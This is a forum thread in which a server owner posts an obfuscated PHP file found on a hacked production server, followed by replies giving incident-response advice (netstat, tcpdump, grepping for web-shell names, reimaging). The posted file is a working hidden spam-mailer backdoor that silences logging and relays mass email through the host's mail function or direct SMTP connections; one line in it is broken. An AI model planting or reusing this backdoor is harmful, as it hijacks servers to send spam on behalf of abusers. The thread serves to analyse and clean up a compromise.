Jump to content

Production Server Hacked


C0NFUS3D
 Share

Recommended Posts

I've received several alerts about one of my production servers... It was sending thousands of spam email. I figured someone got the account password, so I changed them all.... but then it was still happening. I found a rogue php file in the root directory of one of the websites... It could have [possibly] been put their by some kind of injection or with the account password like I thought originally. Not sure, but check it out!

<?php

@error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
if (count($_POST) < 2) {
die(PHP_OS . chr(49) . chr(48) . chr(43) . md5(0987654321));
}
$v5031e998 = false;
foreach (array_keys($_POST) as $v3c6e0b8a) {
switch ($v3c6e0b8a[0]) {
case chr(108):
$vd56b6998 = $v3c6e0b8a;
break;
case chr(100):
$v8d777f38 = $v3c6e0b8a;
break;
case chr(109):
$v3d26b0b1 = $v3c6e0b8a;
break;
case chr(101);
$v5031e998 = true;
break;
}
}
if ($vd56b6998 === '' || $v8d777f38 === '')
die(PHP_OS . chr(49) . chr(49) . chr(43) . md5(0987654321));
$v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
$v01b6e203 = @$_POST[$vd56b6998];
$v8d777f38 = @$_POST[$v8d777f38];
$v3d26b0b1 = @$_POST[$v3d26b0b1];
if ($v5031e998) {
$v01b6e203 = n9a2d8ce3($v01b6e203);
$v8d777f38 = n9a2d8ce3($v8d777f38);
$v3d26b0b1 = n9a2d8ce3($v3d26b0b1);
}
$v01b6e203 = urldecode(stripslashes($v01b6e203));
$v8d777f38 = urldecode(stripslashes($v8d777f38));
$v3d26b0b1 = urldecode(stripslashes($v3d26b0b1));
if (strpos($v01b6e203, '#', 1) != false) {
$v16a9b63f = preg_split('/#/', $v01b6e203);
$ve2942a04 = count($v16a9b63f);
} else {
$v16a9b63f[0] = $v01b6e203;
$ve2942a04 = 1;
}
for ($v865c0c0b = 0; $v865c0c0b < $ve2942a04; $v865c0c0b++) {
$v01b6e203 = $v16a9b63f[$v865c0c0b];
if ($v01b6e203 == '' || !strpos($v01b6e203, '@', 1))
continue;
if (strpos($v01b6e203, ';', 1) != false) {
list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/', strtolower($v01b6e203));
$va3da707b = ucfirst($va3da707b);
$vbfbb12dc = ucfirst($vbfbb12dc);
$v3a5939e4 = next(explode('@', $v081bde0c));
if ($vbfbb12dc == '' || $va3da707b == '') {
$vbfbb12dc = $va3da707b = '';
$v01b6e203 = $v081bde0c;
} else {
$v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>";
}
} else {
$vbfbb12dc = $va3da707b = '';
$v081bde0c = strtolower($v01b6e203);
$v3a5939e4 = next(explode('@', $v01b6e203));
}
preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1);
$vee11cbb1 = $vee11cbb1[1];
preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c);
$vb068931c = $vb068931c[1];
preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9);
$vc34487c9 = $vc34487c9[1];
preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42);
$v6f4b5f42 = $v6f4b5f42[1];
$vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9);
$vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9);
$v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42);
$v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42);
$v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);
if (ne667da76($v0897acf4) || @ini_get('safe_mode'))
$v10497e3f = false;
else
$v10497e3f = true;
$v9a5cb5d8 = "$vee11cbb1@$v0897acf4";
if ($vb068931c != '')
$vd98a07f8 = "$vb068931c <$v9a5cb5d8>";
else
$vd98a07f8 = $v9a5cb5d8;
$vb8ddc93f = "From: $vd98a07f8\r\n";
$vb8ddc93f .= "Reply-To: $vd98a07f8\r\n";
$v3c87b187 = "X-Priority: 3 (Normal)\r\n";
$v3c87b187 .= "MIME-Version: 1.0\r\n";
$v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n";
$v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n";
if (!in_array('mail', $v619d75f8)) {
if ($v10497e3f) {
if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f . $v3c87b187, "-f$v9a5cb5d8")) {
echo (chr(79) . chr(75) . md5(1234567890) . "+0\n");
continue;
}
} else {
if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) {
echo (chr(79) . chr(75) . md5(1234567890) . "+0\n");
continue;
}
}
}
$v4340fd73 = "Date: " . @date("D, j M Y G:i:s O") . "\r\n" . $vb8ddc93f;
$v4340fd73 .= "Message-ID: <" . preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time())) . "@$v0897acf4>\r\n";
$v4340fd73 .= "To: $v01b6e203\r\n";
$v4340fd73 .= "Subject: $vc34487c9\r\n";
$v4340fd73 .= $v3c87b187;
$v841a2d68 = $v4340fd73 . "\r\n" . $v6f4b5f42;
if ($v3d26b0b1 == '')
$v3d26b0b1 = n9c812bad($v3a5939e4);
if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) {
echo (chr(79) . chr(75) . md5(1234567890) . "+1\n");
continue;
} else {
echo PHP_OS . chr(50) . chr(48) . '+' . md5(0987654321) . "+$vb4a88417\n";
}
}
function ne667da76($v957b527b)
{
return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b);
}
function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685 = "=\r\n", $v92f21a0f = 0, $v3303c65a = false)
{
$vf5a8e923 = strlen($vb45cffe0);
$vb4a88417 = '';
for ($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) {
if ($v11a95b8a >= 75) {
$v11a95b8a = $v92f21a0f;
$vb4a88417 .= $v7fa1b685;
}
$v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]);
if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) {
if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) {
$vb4a88417 .= chr($v4a8a08f0);
$v11a95b8a = 0;
continue;
}
$vb4a88417 .= '=' . str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT);
$v11a95b8a += 3;
continue;
}
$vb4a88417 .= chr($v4a8a08f0);
$v11a95b8a++;
}
return $vb4a88417;
}
function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1)
{
global $v619d75f8;
if (!in_array('fsockopen', $v619d75f8))
$v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
elseif (!in_array('pfsockopen', $v619d75f8))
$v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client"))
else
return -1;
if (!$v66b18866) {
return 1;
} else {
$v8d777f38 = n54070395($v66b18866);
@fputs($v66b18866, "EHLO $v0897acf4\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3) != 250)
return "2+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3) != 250)
return "3+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251)
return "4+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "DATA\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3) != 354)
return "5+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, $v841a2d68 . "\r\n.\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3) != 250)
return "6+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "QUIT\r\n");
@fclose($v66b18866);
return 0;
}
}
function n54070395($v66b18866)
{
$v8d777f38 = '';
while ($v341be97d = @fgets($v66b18866, 4096)) {
$v8d777f38 .= $v341be97d;
if (substr($v341be97d, 3, 1) == ' ')
break;
}
return $v8d777f38;
}
function n9c812bad($vad5f82e8)
{
global $v619d75f8;
if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) {
@getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816);
if (count($v744fa43b) === 0)
return '127.0.0.1';
$v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816));
return $v744fa43b[$v865c0c0b[0]];
} else {
return '127.0.0.1';
}
}
function n9a2d8ce3($v1cb251ec)
{
$v1cb251ec = base64_decode($v1cb251ec);
$vc68271a6 = '';
for ($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++)
$vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2);
return $vc68271a6;
}
?>

--- edit ----

the code wrappers were messing up here

Edited by c0nfus3d1
Link to comment
Share on other sites

Ouch. Check for SQL Injection and XXS points in your site and patch them otherwise the attacker will be right back in. Also check your backups and make sure they are not compromised.

Link to comment
Share on other sites

  • 2 weeks later...

get wireshark running on the server if you have it or tcpdump and monitor the traffic, and also run netstat -antp and netstat -anup and check the established connections to your server that seem persistent at all times. If compromised and someone has a backdoor, or bot running, it will most likely keep a connection bound to the server. Also, check /tmp for any rouge files, and ps -Af for fake processes named like apache or httpd but in fact, are actually shell scripts or back doors. Lots of bots, will start fake procs as the name of a normal program, which makes it hard to track down, but usually the owner tied to the process can help if you can show where the process was started from/path it lives in. Would also suggest looking at all your htaccess files in case they added mime types to make regular files like gifs, run as php, etc, which can allow something benign looking as an image, to actually be a shell. quick grep of the server for things in the www readable side or public html path(since they often connect on this side of the fence) for things like c99, xcrew, byroe, edited by, shell, shellexec, base64_decode, and stuff like that, if shows up in files, investigate and remove quickly. Once you identify connections and files, take the server offline, image it for forensics and recon later, then backup important files(make sure they are clean) and reinstall fresh(only way to be sure they are gone). If on shared hosting, notify the host, or move to a VPS. If you have cPanel, check all cpanel directories and email files in those directories as a lot of scripts call home and send emails back to bot owners and leave a trail and logs, and often, create hidden subdomains on your server. ie: site name www.acme.com, they might create flickr.com.acme.com or something similar. Check all start up files and do a reboot before moving to a clean install, see what starts and from where and what calls home after boot. If you have physical access to the machine, might even be nice to port mirror it to capture traffic without them knowing so you can see who is on.

With the netstat stuff, you will usually see established sockets and ones listening on ports you normally don't have services associated with, so be sure to investigate those. lsof I believe also has command switches to show where the processes live/paths of sockets connected so you can kill the file and connections.

If you run a PHP based site, you can also put some code in the header file(or whatever file is used across the whole site) and look for file upload attempts.

I tried posting some code here, but forums keep removing it. PM me if you want a copy of the code. I really don't want it public anyway, since its part of a product in development, but willing to let you use part of it to help log file upload attempts and POST data sent at the domain.

- DigiP

Edited by digip
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...